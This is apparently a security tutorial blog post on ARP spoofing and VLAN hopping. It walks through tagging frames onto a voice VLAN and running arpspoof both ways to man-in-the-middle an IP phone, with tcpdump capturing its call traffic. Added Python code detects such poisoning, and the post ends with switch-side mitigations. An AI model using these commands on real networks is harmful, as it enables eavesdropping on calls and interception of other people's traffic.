Arp Spoofing & VLAN Hopping

I’ll touch on what this is briefly. You will have to research more if you aren’t familiar with VLANs and ARP. ARP spoofing is a layer-2 attack where you send forged ARP replies that map someone else’s IP address (typically the default gateway) to your own MAC address, so the victim’s ARP cache is poisoned and it starts sending its traffic to you.

This is the usual building block for a MITM (man-in-the-middle) attack: you sit between two devices, such as a router and an end-user device, forwarding traffic between them so neither notices. From there further tools can be run to inspect the traffic, modify it, and so on.

ARP is never routed, so ARP spoofing only works within the broadcast domain you are on, which on a switched network means your VLAN. VLANs weren’t really created for security in the first place. They were made so broadcast domains would be smaller, and to help limit broadcast storms. Of course modern switches now add more features (port security, DHCP snooping, dynamic ARP inspection) to help secure your VLANs.

When you are on a certain VLAN, your layer-2 traffic can’t reach the other VLANs; only a router can carry it across. What is possible, when the switch port you are on also accepts tagged frames for another VLAN, is VLAN hopping: you tag your own frames with that VLAN ID and the switch delivers them there. In order to do VLAN hopping your device will need to support 802.1Q VLAN tagging. Linux makes this very easy, so I will be using Ubuntu for the example below.

Let’s start off by installing the vlan package and arpspoof. Note that arpspoof ships as part of the dsniff package, so that is what you install. This will allow us to do VLAN hopping and a MITM attack.

sudo apt-get install vlan dsniff

Once that is done, let’s use modprobe to load the 8021q module so the kernel can send and receive tagged frames. Next we set up a new sub-interface on VLAN 4 (in this example) with an IP address of 10.0.88.134. The eth0.4 interface tags everything it sends with VLAN ID 4 and only receives frames tagged 4. Since no netmask is given, ifconfig falls back to the classful /8 for a 10.x address, which keeps the gateway 10.0.0.1 used below on-link; set the netmask explicitly if the VLAN uses something narrower. vconfig is deprecated on newer distributions, where the equivalent is “ip link add link eth0 name eth0.4 type vlan id 4”.

sudo modprobe 8021q
sudo vconfig add eth0 4
sudo ifconfig eth0.4 up
sudo ifconfig eth0.4 10.0.88.134 up

Now you should be able to communicate with VLAN 4 (ping the gateway to confirm the switch is actually passing your tagged frames). The next part is to do ARP spoofing on this VLAN. For example, let’s say this is a voice VLAN and we would like to do a MITM attack to eavesdrop on phone conversations. In the example below we have chosen the phone at 10.0.88.133 to eavesdrop on, with 10.0.0.1 as its gateway toward the SIP server.

First off we enable IP forwarding so the kernel relays the victim’s packets to their real destination instead of dropping them. Without this the phone loses connectivity as soon as the spoofing starts, which is a very visible sign something is wrong. The redirection has to happen as root, so write the value through tee (or use sysctl -w net.ipv4.ip_forward=1).

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Finally, the two commands below use the eth0.4 interface, since we are doing this on VLAN 4. The syntax is arpspoof -i interface -t target host: arpspoof tells the target that host is at our MAC address. The first command poisons the phone (10.0.88.133) so it sends gateway-bound traffic to us. The second does it in reverse, poisoning the gateway so return traffic for the phone also comes to us, which completes the MITM. arpspoof needs root and keeps re-sending the replies until stopped, so run each one in its own terminal or in the background.

sudo arpspoof -i eth0.4 -t 10.0.88.133 10.0.0.1

sudo arpspoof -i eth0.4 -t 10.0.0.1 10.0.88.133

Once this is done traffic will be forwarded between the two devices through our box, allowing us to run further tools on it. Below tcpdump is used to save a pcap of the phone’s traffic on the tagged interface; the SIP signalling and RTP audio in it can then be opened in Wireshark.

sudo tcpdump -i eth0.4 -w info.pcap host 10.0.88.133
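To make the mechanics above concrete, here is an added example (written for this edit, not part of the original post or the dsniff/arpspoof code). It builds the 802.1Q-tagged ARP “is-at” reply that the kernel puts on the wire when arpspoof runs on eth0.4, parses such frames back, and runs the check a defender would want over a capture: a per-VLAN IP-to-MAC binding table that raises an alert when one IP suddenly claims a second MAC, which is the same idea a switch’s dynamic ARP inspection applies. The MAC addresses and the frame sequence are constructed for illustration; only the IP addresses and VLAN ID come from the write-up above.

```python
"""Build, parse and detect 802.1Q-tagged ARP poisoning frames.

Added example: the MACs and the sample frame sequence are constructed,
the IPs (10.0.88.133 phone, 10.0.0.1 gateway) and VLAN 4 are from the post.
"""
import struct

ETHERTYPE_8021Q = 0x8100
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2

# Constructed addresses (assumption, not from the post).
GW_MAC = "00:11:22:33:44:01"
PHONE_MAC = "00:11:22:33:44:02"
ATTACKER_MAC = "00:11:22:33:44:aa"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_tagged_arp_reply(vlan_id, src_mac, src_ip, dst_mac, dst_ip):
    """Ethernet II frame + 802.1Q tag + ARP reply claiming src_ip is at src_mac.

    This is what `arpspoof -i eth0.4 -t dst_ip src_ip` produces once the
    kernel tags it for VLAN vlan_id: an unsolicited reply aimed at dst_mac.
    """
    tci = vlan_id & 0x0FFF                      # PCP=0, DEI=0, 12-bit VID
    eth = (mac_bytes(dst_mac) + mac_bytes(src_mac)
           + struct.pack("!HH", ETHERTYPE_8021Q, tci)
           + struct.pack("!H", ETHERTYPE_ARP))
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet/IPv4
           + mac_bytes(src_mac) + ip_bytes(src_ip)             # sender (spoofed)
           + mac_bytes(dst_mac) + ip_bytes(dst_ip))            # target
    return eth + arp


def parse_frame(frame):
    """Return the VLAN ID (None if untagged) and ARP fields, or None if not ARP."""
    etype = struct.unpack("!H", frame[12:14])[0]
    vlan, off = None, 14
    if etype == ETHERTYPE_8021Q:
        tci, etype = struct.unpack("!HH", frame[14:18])
        vlan, off = tci & 0x0FFF, 18
    if etype != ETHERTYPE_ARP:
        return None
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[off:off + 8])
    p = off + 8
    return {
        "vlan": vlan,
        "op": op,
        "sender_mac": mac_str(frame[p:p + 6]),
        "sender_ip": ip_str(frame[p + 6:p + 10]),
        "target_mac": mac_str(frame[p + 10:p + 16]),
        "target_ip": ip_str(frame[p + 16:p + 20]),
    }


def detect_poisoning(frames):
    """Flag any (vlan, IP) that is seen answering from two different MACs.

    Returns a list of (vlan, ip, first_mac, new_mac) tuples. The first MAC
    seen is trusted, so run this from the start of a capture or seed the
    table from DHCP leases, as dynamic ARP inspection does on a switch.
    """
    bindings, alerts = {}, []
    for frame in frames:
        arp = parse_frame(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            continue
        key = (arp["vlan"], arp["sender_ip"])
        known = bindings.setdefault(key, arp["sender_mac"])
        if known != arp["sender_mac"]:
            alerts.append((arp["vlan"], arp["sender_ip"], known, arp["sender_mac"]))
    return alerts


def demo_alerts():
    """Constructed capture: two legitimate replies, then the two arpspoof directions."""
    frames = [
        build_tagged_arp_reply(4, GW_MAC, "10.0.0.1", PHONE_MAC, "10.0.88.133"),
        build_tagged_arp_reply(4, PHONE_MAC, "10.0.88.133", GW_MAC, "10.0.0.1"),
        # arpspoof -i eth0.4 -t 10.0.88.133 10.0.0.1
        build_tagged_arp_reply(4, ATTACKER_MAC, "10.0.0.1", PHONE_MAC, "10.0.88.133"),
        # arpspoof -i eth0.4 -t 10.0.0.1 10.0.88.133
        build_tagged_arp_reply(4, ATTACKER_MAC, "10.0.88.133", GW_MAC, "10.0.0.1"),
    ]
    return detect_poisoning(frames)


if __name__ == "__main__":
    for vlan, ip, old, new in demo_alerts():
        print(f"VLAN {vlan}: {ip} moved from {old} to {new}")
```

Feeding real frames from the pcap above into parse_frame (Scapy’s rdpcap or the raw bytes from a socket) turns this into a simple poisoning detector; on the switch side the equivalent control is dynamic ARP inspection backed by DHCP snooping, which drops exactly the frames the attacker sends here.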

What this shows us is that default VLAN settings aren’t enough. Most IP phones also act as a small switch: the PC plugs into the phone, the phone plugs into the switch, and the phone sends its own traffic tagged with the voice VLAN while the PC’s traffic goes untagged on the data VLAN. Because the switch port accepts tagged frames for the voice VLAN from anything behind it, a PC in the phone’s position can tag its own frames and join that VLAN. Of course this applies to any other devices as well.

Phones are just a great example to illustrate VLAN hopping. Since the phone and PC both connect into one port on a switch that in turn carries two VLANs (one for the PC, another for the phone), this seems like a secure setup, but it can still be exploited.

To mitigate this, limiting the number of MAC addresses allowed on a switch port (port security) helps, since the attacking PC shows up as an extra MAC on the voice VLAN. To prevent ARP spoofing, use static ARP entries for the default gateway on the hosts you control, and for the switch itself if it does layer-3 routing; static entries don’t scale to phones, though, so the switch-side fix is dynamic ARP inspection, which drops ARP replies that don’t match the DHCP snooping binding table.

This link goes over VLAN hopping in more detail and also includes some common mitigation steps, among them the usual ones: don’t use VLAN 1 for anything, and disable trunking (and DTP negotiation) on ports that don’t need it.

https://www.exploit-db.com/docs/english/45050-vlan-hopping-attack.pdf
